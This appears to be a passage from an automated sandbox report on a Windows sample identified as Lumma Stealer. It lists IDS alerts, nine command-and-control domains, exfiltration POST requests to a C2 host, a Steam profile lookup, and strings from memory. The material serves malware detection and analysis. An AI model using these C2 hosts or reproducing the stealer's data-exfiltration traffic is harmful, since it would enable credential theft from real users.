            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebp, eax3_2_02105D17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_02125D57
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0212BD67
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0211AD91
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0211BD88
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0212EDC6

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.10:53181 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.10:63928 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.10:62827 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.10:61213 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.10:58750 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.10:61203 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.10:50081 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.10:51184 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.10:50661 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49706 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49725 -> 104.21.80.1:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: chipdonkeruz.shop
            Source: Malware configuration extractorURLs: versersleep.shop
            Source: Malware configuration extractorURLs: crowdwarek.shop
            Source: Malware configuration extractorURLs: robinsharez.shop
            Source: Malware configuration extractorURLs: handscreamny.shop
            Source: Malware configuration extractorURLs: skidjazzyric.click
            Source: Malware configuration extractorURLs: femalsabler.shop
            Source: Malware configuration extractorURLs: soundtappysk.shop
            Source: Malware configuration extractorURLs: apporholis.shop
            Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49734 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49743 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OG13XW2VA62H57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86RQ8NVHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15009Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I3XGM3M5HS6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20389Host: sputnik-1985.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://checkout.steampowered.com/ wss://communitsputnik-1985.comsputnik-1985.comin.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com h equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=5abb7e8fb5f032eedda81f11; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 11 Jan 2025 06:48:33 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [sputnik-1985.comsputnik-1985.comicydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com h equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com h equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: in.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
            Source: global trafficDNS traffic detected: DNS query: soundtappysk.shop
            Source: global trafficDNS traffic detected: DNS query: femalsabler.shop
            Source: global trafficDNS traffic detected: DNS query: apporholis.shop
            Source: global trafficDNS traffic detected: DNS query: crowdwarek.shop
            Source: global trafficDNS traffic detected: DNS query: versersleep.shop
            Source: global trafficDNS traffic detected: DNS query: chipdonkeruz.shop
            Source: global trafficDNS traffic detected: DNS query: handscreamny.shop
            Source: global trafficDNS traffic detected: DNS query: robinsharez.shop
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
